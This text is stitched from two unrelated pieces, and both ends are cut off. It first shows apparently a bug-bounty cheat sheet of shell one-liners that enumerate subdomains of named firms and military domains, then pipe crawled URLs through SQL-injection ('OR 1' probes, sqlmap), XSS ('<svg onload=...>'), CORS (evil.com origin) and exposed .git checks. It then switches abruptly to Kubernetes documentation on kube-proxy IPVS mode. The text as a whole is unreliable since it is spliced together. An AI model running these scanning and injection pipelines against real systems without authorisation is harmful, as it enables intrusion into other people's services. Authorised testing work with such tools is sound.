; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search](https://github.com/gwen001/github-search) Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command](https://bit.ly/3jslKle) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command](https://bit.ly/3hL263x) echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command](https://bit.ly/2YXiK8N) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command](https://bit.ly/2Go3Ba4) ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command](https://bit.ly/357b1IY) ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command](https://bit.ly/2R2gNn5) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command](https://bit.ly/2ZeAhcF) ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command](https://bit.ly/3jXbTnU) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command](https://bit.ly/3hfNV5k) ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command](https://bit.ly/3hfNV5k) ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command](https://bit.ly/2Zs13yj) ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command](https://bit.ly/3ioYuV0) ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command](https://bit.ly/33qT71x) ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' ``` ### Search to js using hakrawler and rush & unew - [Explained command](https://bit.ly/2Rqn9gn) ```bash cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command](https://bit.ly/32MZfCa) ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command](https://bit.ly/32T5W5O) ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command](https://bit.ly/3icrr5R) ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command](https://bit.ly/3dvP6xq) ```bash cat subdomsains.txt | httpx --silent | jsubfinder search -s ``` ### Search domains to Range-IPS. - [Explained command](https://bit.ly/3fa0eAO) ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command](https://bit.ly/3kNTHNm) ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command](https://bit.ly/2JpRsmS) ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command](https://bit.ly/3gsbzNt) ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command](https://bit.ly/37avq0C) ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command](https://bit.ly/3m9AsOY) ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
- [IPVS](#ipvs) - [What is IPVS](#what-is-ipvs) - [IPVS vs. IPTABLES](#ipvs-vs-iptables) - [When IPVS falls back to IPTABLES](#when-ipvs-falls-back-to-iptables) - [Run kube-proxy in IPVS mode](#run-kube-proxy-in-ipvs-mode) - [Prerequisite](#prerequisite) - [Local UP Cluster](#local-up-cluster) - [GCE Cluster](#gce-cluster) - [Cluster Created by Kubeadm](#cluster-created-by-kubeadm) - [Debug](#debug) - [Check IPVS proxy rules](#check-ipvs-proxy-rules) - [Why kube-proxy can't start IPVS mode](#why-kube-proxy-cant-start-ipvs-mode) # IPVS This document intends to show users - what is IPVS - difference between IPVS and IPTABLES - how to run kube-proxy in IPVS mode and info on debugging ## What is IPVS **IPVS (IP Virtual Server)** implements transport-layer load balancing, usually called Layer 4 LAN switching, as part of Linux kernel. IPVS runs on a host and acts as a load balancer in front of a cluster of real servers. IPVS can direct requests for TCP and UDP-based services to the real servers, and make services of real servers appear as virtual services on a single IP address. ## IPVS vs. IPTABLES IPVS mode was introduced in Kubernetes v1.8, goes beta in v1.9 and GA in v1.11. IPTABLES mode was added in v1.1 and become the default operating mode since v1.2. Both IPVS and IPTABLES are based on `netfilter`. Differences between IPVS mode and IPTABLES mode are as follows: 1. IPVS provides better scalability and performance for large clusters. 2. IPVS supports more sophisticated load balancing algorithms than IPTABLES (least load, least connections, locality, weighted, etc.). 3. IPVS supports server health checking and connection retries, etc. ### When IPVS falls back to IPTABLES IPVS proxier will employ IPTABLES in doing packet filtering, SNAT or masquerade. Specifically, IPVS proxier will use ipset to store source or destination address of traffics that need DROP or do masquerade, to make sure the number of IPTABLES rules be constant, no matter how many services we have. Here is the table of ipset sets that IPVS proxier used. | set name | members | usage | | :----------------------------- | ---------------------------------------- | ---------------------------------------- | | KUBE-CLUSTER-IP | All service IP + port | Mark-Masq for cases that `masquerade-all=true` or `clusterCIDR` specified | | KUBE-LOOP-BACK | All service IP + port + IP | masquerade for solving hairpin purpose | | KUBE-EXTERNAL-IP | service external IP + port | masquerade for packages to external IPs | | KUBE-LOAD-BALANCER | load balancer ingress IP + port | masquerade for packages to load balancer type service | | KUBE-LOAD-BALANCER-LOCAL | LB ingress IP + port with `externalTrafficPolicy=local` | accept packages to load balancer with `externalTrafficPolicy=local` | | KUBE-LOAD-BALANCER-FW | load balancer ingress IP + port with `loadBalancerSourceRanges` | package filter for load balancer with `loadBalancerSourceRanges` specified | | KUBE-LOAD-BALANCER-SOURCE-CIDR | load balancer ingress IP + port + source CIDR | package filter for load balancer with `loadBalancerSourceRanges` specified | | KUBE-NODE-PORT-TCP | nodeport type service TCP port | masquerade for packets to nodePort(TCP) | | KUBE-NODE-PORT-LOCAL-TCP | nodeport type service TCP port with `externalTrafficPolicy=local` | accept packages to nodeport service with `externalTrafficPolicy=local` | | KUBE-NODE-PORT-UDP | nodeport type service UDP port | masquerade for packets to nodePort(UDP) | | KUBE-NODE-PORT-LOCAL-UDP | nodeport type service UDP port with `externalTrafficPolicy=local` | accept packages to nodeport service with `externalTrafficPolicy=local` | IPVS proxier will fall back on IPTABLES in the following scenarios. **1. kube-proxy starts with --masquerade-all=true** If kube-proxy starts with `--masquerade-all=true`, IPVS proxier will masquerade all traffic accessing service Cluster IP, which behaves the same as what IPTABLES proxier. Suppose kube-proxy has flag `--masquerade-all=true` specified, then the IPTABLES installed by IPVS proxier should be like what is shown below. ```shell # iptables -t nat -nL Chain PREROUTING (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain OUTPUT (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain POSTROUTING (policy ACCEPT) target prot opt source destination KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */ Chain KUBE-MARK-MASQ (2 references) target prot opt source destination MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000 Chain KUBE-POSTROUTING (1 references) target prot opt source destination MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000 MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOOP-BACK dst,dst,src Chain KUBE-SERVICES (2 references) target prot opt source destination KUBE-MARK-MASQ all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-CLUSTER-IP dst,dst ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-CLUSTER-IP dst,dst ``` **2. Specify cluster CIDR in kube-proxy startup** If kube-proxy starts with `--cluster-cidr=<cidr>`, IPVS proxier will masquerade off-cluster traffic accessing service Cluster IP, which behaves the same as what IPTABLES proxier. Suppose kube-proxy is provided with the cluster cidr `10.244.16.0/24`, then the IPTABLES installed by IPVS proxier should be like what is shown below. ```shell # iptables -t nat -nL Chain PREROUTING (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain OUTPUT (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain POSTROUTING (policy ACCEPT) target prot opt source destination KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */ Chain KUBE-MARK-MASQ (3 references) target prot opt source destination MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000 Chain KUBE-POSTROUTING (1 references) target prot opt source destination MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000 MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOOP-BACK dst,dst,src Chain KUBE-SERVICES (2 references) target prot opt source destination KUBE-MARK-MASQ all -- !10.244.16.0/24 0.0.0.0/0 match-set KUBE-CLUSTER-IP dst,dst ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-CLUSTER-IP dst,dst ``` **3. Load Balancer type service** For loadBalancer type service, IPVS proxier will install IPTABLES with match of ipset `KUBE-LOAD-BALANCER`. Specially when service's `LoadBalancerSourceRanges` is specified or specified `externalTrafficPolicy=local`, IPVS proxier will create ipset sets `KUBE-LOAD-BALANCER-LOCAL`/`KUBE-LOAD-BALANCER-FW`/`KUBE-LOAD-BALANCER-SOURCE-CIDR` and install IPTABLES accordingly, which should look like what is shown below. ```shell # iptables -t nat -nL Chain PREROUTING (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain OUTPUT (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain POSTROUTING (policy ACCEPT) target prot opt source destination KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */ Chain KUBE-FIREWALL (1 references) target prot opt source destination RETURN all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOAD-BALANCER-SOURCE-CIDR dst,dst,src KUBE-MARK-DROP all -- 0.0.0.0/0 0.0.0.0/0 Chain KUBE-LOAD-BALANCER (1 references) target prot opt source destination KUBE-FIREWALL all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOAD-BALANCER-FW dst,dst RETURN all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOAD-BALANCER-LOCAL dst,dst KUBE-MARK-MASQ all -- 0.0.0.0/0 0.0.0.0/0 Chain KUBE-MARK-DROP (1 references) target prot opt source destination MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x8000 Chain KUBE-MARK-MASQ (2 references) target prot opt source destination MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000 Chain KUBE-POSTROUTING (1 references) target prot opt source destination MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000 MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOOP-BACK dst,dst,src Chain KUBE-SERVICES (2 references) target prot opt source destination KUBE-LOAD-BALANCER all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOAD-BALANCER dst,dst ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOAD-BALANCER dst,dst ``` **4. NodePort type service** For NodePort type service, IPVS proxier will install IPTABLES with match of ipset `KUBE-NODE-PORT-TCP/KUBE-NODE-PORT-UDP`. When specified `externalTrafficPolicy=local`, IPVS proxier will create ipset sets `KUBE-NODE-PORT-LOCAL-TCP/KUBE-NODE-PORT-LOCAL-UDP` and install IPTABLES accordingly, which should look like what is shown below. Suppose service with TCP type nodePort. ```shell Chain PREROUTING (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain OUTPUT (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain POSTROUTING (policy ACCEPT) target prot opt source destination KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */ Chain KUBE-MARK-MASQ (2 references) target prot opt source destination MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000 Chain KUBE-NODE-PORT (1 references) target prot opt source destination RETURN all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-NODE-PORT-LOCAL-TCP dst KUBE-MARK-MASQ all -- 0.0.0.0/0 0.0.0.0/0 Chain KUBE-POSTROUTING (1 references) target prot opt source destination MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000 MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOOP-BACK dst,dst,src Chain KUBE-SERVICES (2 references) target prot opt source destination KUBE-NODE-PORT all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-NODE-PORT-TCP dst ``` **5. Service with externalIPs specified** For service with `externalIPs` specified, IPVS proxier will install IPTABLES with match of ipset `KUBE-EXTERNAL-IP`, Suppose we have service with `externalIPs` specified, IPTABLES rules should look like what is shown below. ```shell Chain PREROUTING (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain OUTPUT (policy ACCEPT) target prot opt source destination KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */ Chain POSTROUTING (policy ACCEPT) target prot opt source destination KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */ Chain KUBE-MARK-MASQ (2 references) target prot opt source destination MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000 Chain KUBE-POSTROUTING (1 references) target prot opt source destination MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000 MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOOP-BACK dst,dst,src Chain KUBE-SERVICES (2 references) target prot opt source destination KUBE-MARK-MASQ all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-EXTERNAL-IP dst,dst ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-EXTERNAL-IP dst,dst PHYSDEV match ! --physdev-is-in ADDRTYPE match src-type !LOCAL ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-EXTERNAL-IP dst,dst ADDRTYPE match dst-type LOCAL ``` ## Run kube-proxy in IPVS mode Currently, local-up scripts, GCE scripts and kubeadm support switching IPVS proxy mode via exporting environment variables or specifying flags. ### Prerequisite Ensure IPVS required kernel modules (**Notes**: use `nf_conntrack` instead of `nf_conntrack_ipv4` for Linux kernel 4.19 and later) ```shell ip_vs ip_vs_rr ip_vs_wrr ip_vs_sh nf_conntrack_ipv4 ``` 1. have been compiled into the node kernel. Use `grep -e ipvs -e nf_conntrack_ipv4 /lib/modules/$(uname -r)/modules.builtin` and get results like the followings if compiled into kernel. ``` kernel/net/ipv4/netfilter/nf_conntrack_ipv4.ko kernel/net/netfilter/ipvs/ip_vs.ko kernel/net/netfilter/ipvs/ip_vs_rr.ko kernel/net/netfilter/ipvs/ip_vs_wrr.ko kernel/net/netfilter/ipvs/ip_vs_lc.ko kernel/net/netfilter/ipvs/ip_vs_wlc.ko kernel/net/netfilter/ipvs/ip_vs_fo.ko kernel/net/netfilter/ipvs/ip_vs_ovf.ko kernel/net/netfilter/ipvs/ip_vs_lblc.ko kernel/net/netfilter/ipvs/ip_vs_lblcr.ko kernel/net/netfilter/ipvs/ip_vs_dh.ko kernel/net/netfilter/ipvs/ip_vs_sh.ko kernel/net/netfilter/ipvs/ip_vs_sed.ko kernel/net/netfilter/ipvs/ip_vs_nq.ko kernel/net/netfilter/ipvs/ip_vs_ftp.ko ``` OR 2. have been loaded. ```shell # load module <module_name> modprobe -- ip_vs modprobe -- ip_vs_rr modprobe -- ip_vs_wrr modprobe -- 